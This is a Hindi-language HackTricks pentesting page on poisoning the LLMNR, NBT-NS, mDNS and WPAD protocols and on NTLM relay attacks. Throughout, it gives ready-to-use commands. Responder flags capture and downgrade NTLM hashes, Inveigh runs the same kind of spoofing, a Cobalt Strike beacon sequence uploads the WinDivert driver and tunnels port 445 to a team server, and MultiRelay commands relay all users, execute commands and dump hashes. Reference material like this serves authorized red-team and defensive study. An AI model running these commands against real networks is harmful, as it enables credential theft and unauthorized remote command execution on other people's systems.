HackTricksSpoofing LLMNR, NBT-NS, mDNS/DNS और WPAD और Relay Attacks
Reading time: 7 minutes
tip
AWS हैकिंग सीखें और अभ्यास करें:
HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: 
HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
Network Protocols
Local Host Resolution Protocols
- LLMNR, NBT-NS, और mDNS:
- Microsoft और अन्य ऑपरेटिंग सिस्टम DNS विफल होने पर स्थानीय नाम समाधान के लिए LLMNR और NBT-NS का उपयोग करते हैं। इसी तरह, Apple और Linux सिस्टम mDNS का उपयोग करते हैं।
- ये प्रोटोकॉल UDP पर अपनी अनधिकृत, प्रसारण प्रकृति के कारण इंटरसेप्शन और स्पूफिंग के प्रति संवेदनशील हैं।
- Responder का उपयोग इन प्रोटोकॉल को क्वेरी करने वाले होस्ट को जाली प्रतिक्रियाएँ भेजकर सेवाओं का अनुकरण करने के लिए किया जा सकता है।
- Responder का उपयोग करके सेवा अनुकरण पर अधिक जानकारी यहाँ मिल सकती है।
Web Proxy Auto-Discovery Protocol (WPAD)
- WPAD ब्राउज़रों को स्वचालित रूप से प्रॉक्सी सेटिंग्स खोजने की अनुमति देता है।
- खोज DHCP, DNS, या DNS विफल होने पर LLMNR और NBT-NS पर वापस जाकर की जाती है।
- Responder WPAD हमलों को स्वचालित कर सकता है, ग्राहकों को दुर्भावनापूर्ण WPAD सर्वरों की ओर निर्देशित करता है।
Responder for Protocol Poisoning
- Responder एक उपकरण है जिसका उपयोग LLMNR, NBT-NS, और mDNS क्वेरीज़ को ज़हर देने के लिए किया जाता है, जो क्वेरी प्रकारों के आधार पर चयनात्मक रूप से प्रतिक्रिया करता है, मुख्य रूप से SMB सेवाओं को लक्षित करता है।
- यह Kali Linux में पूर्व-स्थापित आता है, जिसे
/etc/responder/Responder.confपर कॉन्फ़िगर किया जा सकता है। - Responder स्क्रीन पर कैप्चर किए गए हैश प्रदर्शित करता है और उन्हें
/usr/share/responder/logsनिर्देशिका में सहेजता है। - यह IPv4 और IPv6 दोनों का समर्थन करता है।
- Responder का Windows संस्करण यहाँ उपलब्ध है।
Running Responder
- डिफ़ॉल्ट सेटिंग्स के साथ Responder चलाने के लिए:
responder -I <Interface> - अधिक आक्रामक प्रोबिंग के लिए (संभावित दुष्प्रभावों के साथ):
responder -I <Interface> -P -r -v - आसान क्रैकिंग के लिए NTLMv1 चुनौतियों/प्रतिक्रियाओं को कैप्चर करने की तकनीकें:
responder -I <Interface> --lm --disable-ess - WPAD अनुकरण को सक्रिय किया जा सकता है:
responder -I <Interface> --wpad - NetBIOS अनुरोधों को हमलावर के IP पर हल किया जा सकता है, और एक प्रमाणीकरण प्रॉक्सी स्थापित की जा सकती है:
responder.py -I <interface> -Pv
DHCP Poisoning with Responder
- DHCP प्रतिक्रियाओं को स्पूफ करना एक पीड़ित की रूटिंग जानकारी को स्थायी रूप से ज़हर दे सकता है, ARP ज़हर देने के लिए एक अधिक छिपा हुआ विकल्प प्रदान करता है।
- यह लक्षित नेटवर्क की कॉन्फ़िगरेशन के बारे में सटीक ज्ञान की आवश्यकता होती है।
- हमले को चलाना:
./Responder.py -I eth0 -Pdv - यह विधि NTLMv1/2 हैश को प्रभावी ढंग से कैप्चर कर सकती है, लेकिन नेटवर्क में व्यवधान से बचने के लिए सावधानीपूर्वक हैंडलिंग की आवश्यकता होती है।
Capturing Credentials with Responder
- Responder उपरोक्त प्रोटोकॉल का उपयोग करके सेवाओं का अनुकरण करेगा, जब एक उपयोगकर्ता स्पूफ की गई सेवाओं के खिलाफ प्रमाणीकरण करने का प्रयास करता है, तो क्रेडेंशियल्स (आमतौर पर NTLMv2 Challenge/Response) कैप्चर करता है।
- NetNTLMv1 में डाउनग्रेड करने या आसान क्रेडेंशियल क्रैकिंग के लिए ESS को निष्क्रिय करने का प्रयास किया जा सकता है।
यह महत्वपूर्ण है कि इन तकनीकों का उपयोग कानूनी और नैतिक रूप से किया जाना चाहिए, उचित प्राधिकरण सुनिश्चित करना और व्यवधान या अनधिकृत पहुंच से बचना चाहिए।
Inveigh
Inveigh एक उपकरण है जो पेनिट्रेशन टेस्टर्स और रेड टीमर्स के लिए डिज़ाइन किया गया है, जो Windows सिस्टम के लिए है। यह Responder के समान कार्यक्षमताएँ प्रदान करता है, स्पूफिंग और मैन-इन-द-मिडल हमले करता है। यह उपकरण PowerShell स्क्रिप्ट से C# बाइनरी में विकसित हुआ है, जिसमें Inveigh और InveighZero मुख्य संस्करण हैं। विस्तृत पैरामीटर और निर्देश wiki में मिल सकते हैं।
Inveigh को PowerShell के माध्यम से संचालित किया जा सकता है:
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
या C# बाइनरी के रूप में निष्पादित किया गया:
Inveigh.exe
NTLM Relay Attack
यह हमला SMB प्रमाणीकरण सत्रों का उपयोग करके एक लक्षित मशीन तक पहुँचने के लिए किया जाता है, यदि सफल हो तो एक सिस्टम शेल प्रदान करता है। मुख्य पूर्वापेक्षाएँ शामिल हैं:
- प्रमाणीकरण करने वाले उपयोगकर्ता को रिले किए गए होस्ट पर स्थानीय व्यवस्थापक पहुँच होनी चाहिए।
- SMB साइनिंग को अक्षम किया जाना चाहिए।
445 Port Forwarding and Tunneling
उन परिदृश्यों में जहाँ सीधे नेटवर्क परिचय संभव नहीं है, पोर्ट 445 पर ट्रैफ़िक को अग्रेषित और टनल करने की आवश्यकता होती है। PortBender जैसे उपकरण पोर्ट 445 के ट्रैफ़िक को दूसरे पोर्ट पर पुनर्निर्देशित करने में मदद करते हैं, जो तब आवश्यक होता है जब ड्राइवर लोड करने के लिए स्थानीय व्यवस्थापक पहुँच उपलब्ध हो।
PortBender सेटअप और संचालन Cobalt Strike में:
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
NTLM रिले हमले के लिए अन्य उपकरण
- Metasploit: प्रॉक्सी, स्थानीय और दूरस्थ होस्ट विवरण के साथ सेटअप करें।
- smbrelayx: SMB सत्रों को रिले करने और कमांड निष्पादित करने या बैकडोर तैनात करने के लिए एक Python स्क्रिप्ट।
- MultiRelay: Responder सूट से एक उपकरण जो विशिष्ट उपयोगकर्ताओं या सभी उपयोगकर्ताओं को रिले करने, कमांड निष्पादित करने या हैश डंप करने के लिए है।
यदि आवश्यक हो, तो प्रत्येक उपकरण को SOCKS प्रॉक्सी के माध्यम से संचालित करने के लिए कॉन्फ़िगर किया जा सकता है, जिससे अप्रत्यक्ष नेटवर्क पहुंच के साथ भी हमले सक्षम होते हैं।
MultiRelay संचालन
MultiRelay /usr/share/responder/tools निर्देशिका से निष्पादित किया जाता है, विशिष्ट IPs या उपयोगकर्ताओं को लक्षित करता है।
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
ये उपकरण और तकनीकें विभिन्न नेटवर्क वातावरण में NTLM Relay हमलों को करने के लिए एक व्यापक सेट बनाती हैं।
NTLM लॉगिन को मजबूर करना
Windows में आप कुछ विशेषाधिकार प्राप्त खातों को मनमाने मशीनों पर प्रमाणीकरण करने के लिए मजबूर कर सकते हैं। जानने के लिए निम्नलिखित पृष्ठ पढ़ें:
Force NTLM Privileged Authentication
संदर्भ
- https://intrinium.com/smb-relay-attack-tutorial/
- https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
- https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
- https://intrinium.com/smb-relay-attack-tutorial/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।